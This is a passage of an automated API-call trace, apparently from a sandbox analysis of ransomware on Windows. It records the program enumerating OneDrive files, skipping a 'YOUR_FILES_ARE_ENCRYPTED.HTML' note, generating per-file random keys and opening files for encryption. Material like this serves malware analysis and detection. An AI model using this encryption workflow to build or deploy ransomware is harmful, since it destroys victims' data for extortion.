StrStrIW (lpFirst="ETWlog.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.264] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll") returned 86 [0112.264] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0112.264] lstrlenW (lpString=".dll") returned 4 [0112.264] PathFindExtensionW (pszPath="ETWlog.dll") returned=".dll" [0112.264] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\etwlog.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0112.264] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=29376) returned 1 [0112.264] GetProcessHeap () returned 0x600000 [0112.264] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x688490 [0112.354] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="56") returned 2 [0112.354] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="ED") returned 2 [0112.354] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="D5") returned 2 [0112.354] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="95") returned 2 [0112.354] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="99") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="44") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="B0") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="2C") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="E7") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="93") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="68") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="B4") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="C8") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="A1") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="AA") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="6C") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="C6") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F1") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="4B") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="4C") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="9B") returned 2 [0112.355] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="FC") returned 2 [0112.355] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="C8") returned 2 [0112.355] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="C2") returned 2 [0112.355] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="AC") returned 2 [0112.355] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="7D") returned 2 [0112.355] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="17") returned 2 [0112.355] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="10") returned 2 [0112.355] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="07") returned 2 [0112.355] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="D0") returned 2 [0112.355] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="94") returned 2 [0112.355] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5D") returned 2 [0112.356] lstrcpyW (in: lpString1=0x698544, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ETWlog.dll" [0112.356] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x688490, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.356] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x688490, lpOverlapped=0x688490) returned 1 [0112.361] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe42ba1e4, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xe42ba1e4, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe7c64fd5, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x4e5f, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ExclusionList.xml", cAlternateFileName="EXCLUS~1.XML")) returned 1 [0112.361] StrStrIW (lpFirst="ExclusionList.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.361] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml") returned 93 [0112.365] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0112.365] lstrlenW (lpString=".xml") returned 4 [0112.365] PathFindExtensionW (pszPath="ExclusionList.xml") returned=".xml" [0112.365] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\exclusionlist.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0112.366] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=20063) returned 1 [0112.366] GetProcessHeap () returned 0x600000 [0112.366] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.369] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7B") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="6B") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E8") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="51") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="D3") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="86") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D2") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="DD") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="22") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="A7") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="32") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="28") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="47") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="F3") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="17") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="01") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="73") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="28") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="1B") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="1A") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="5D") returned 2 [0112.369] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="37") returned 2 [0112.369] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="ED") returned 2 [0112.369] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="1D") returned 2 [0112.369] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="2E") returned 2 [0112.369] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="98") returned 2 [0112.369] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="80") returned 2 [0112.369] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="7D") returned 2 [0112.369] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="6E") returned 2 [0112.369] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="00") returned 2 [0112.369] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="E1") returned 2 [0112.369] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="42") returned 2 [0112.370] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml" [0112.370] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.370] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.370] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb1bd98b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xeb1bd98b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xeb3ad73a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x140c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.LocalizedResources.dll", cAlternateFileName="FILESY~1.DLL")) returned 1 [0112.370] StrStrIW (lpFirst="FileSync.LocalizedResources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.370] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll") returned 107 [0112.370] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0112.370] lstrlenW (lpString=".dll") returned 4 [0112.370] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll") returned=".dll" [0112.370] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\filesync.localizedresources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0112.371] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=82112) returned 1 [0112.371] GetProcessHeap () returned 0x600000 [0112.371] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0112.373] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="B0") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="2E") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="8F") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D9") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="E9") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="45") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="4A") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="39") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="48") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E8") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="08") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="80") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="CE") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="41") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="F7") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="99") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="66") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="E7") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EB") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="D3") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="E7") returned 2 [0112.374] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="0B") returned 2 [0112.374] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="E0") returned 2 [0112.374] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F7") returned 2 [0112.374] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="85") returned 2 [0112.374] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="0D") returned 2 [0112.374] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="19") returned 2 [0112.374] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="46") returned 2 [0112.374] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="8F") returned 2 [0112.374] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="D0") returned 2 [0112.374] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="B5") returned 2 [0112.374] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="5E") returned 2 [0112.375] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll" [0112.375] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.375] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0112.375] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecc43b7e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xecc43b7e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf5c4b24e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x28d8c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSync.Resources.dll", cAlternateFileName="FILESY~2.DLL")) returned 1 [0112.375] StrStrIW (lpFirst="FileSync.Resources.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.375] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll") returned 98 [0112.375] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0112.375] lstrlenW (lpString=".dll") returned 4 [0112.375] PathFindExtensionW (pszPath="FileSync.Resources.dll") returned=".dll" [0112.375] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\filesync.resources.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0112.377] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=2676928) returned 1 [0112.377] GetProcessHeap () returned 0x600000 [0112.377] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0112.379] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="D5") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="97") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E7") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="F2") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="EB") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="C3") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="8F") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="CE") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7E") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="B2") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="80") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="AB") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="FF") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="B1") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="AC") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="0D") returned 2 [0112.379] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="05") returned 2 [0112.380] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="59") returned 2 [0112.380] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="34") returned 2 [0112.380] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B8") returned 2 [0112.380] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="22") returned 2 [0112.380] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="50") returned 2 [0112.380] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="1E") returned 2 [0112.380] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="6E") returned 2 [0112.380] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="1F") returned 2 [0112.380] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="B7") returned 2 [0112.380] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="D0") returned 2 [0112.380] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="83") returned 2 [0112.380] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="21") returned 2 [0112.380] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="8A") returned 2 [0112.380] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="67") returned 2 [0112.380] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="62") returned 2 [0112.380] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll" [0112.381] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.381] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0112.381] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf77c8633, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf77c8633, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d9801d, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x362c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="FileSyncApi.dll", cAlternateFileName="FILESY~3.DLL")) returned 1 [0112.381] StrStrIW (lpFirst="FileSyncApi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.381] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll") returned 91 [0112.381] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0112.381] lstrlenW (lpString=".dll") returned 4 [0112.381] PathFindExtensionW (pszPath="FileSyncApi.dll") returned=".dll" [0112.381] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\filesyncapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0112.383] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=221888) returned 1 [0112.384] GetProcessHeap () returned 0x600000 [0112.384] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x660338 [0112.387] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="7C") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="4F") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="35") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="63") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="7A") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="BA") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="38") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="68") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="C4") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="3D") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="16") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="1B") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="98") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="1F") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="6E") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="11") returned 2 [0112.387] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="97") returned 2 [0112.388] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="51") returned 2 [0112.388] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C8") returned 2 [0112.388] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="15") returned 2 [0112.388] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="DC") returned 2 [0112.388] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="38") returned 2 [0112.388] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="D4") returned 2 [0112.388] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="2E") returned 2 [0112.388] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="B1") returned 2 [0112.388] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="BD") returned 2 [0112.388] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="77") returned 2 [0112.388] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="50") returned 2 [0112.388] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="FD") returned 2 [0112.388] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="69") returned 2 [0112.388] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="97") returned 2 [0112.388] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="66") returned 2 [0112.388] lstrcpyW (in: lpString1=0x6703ec, 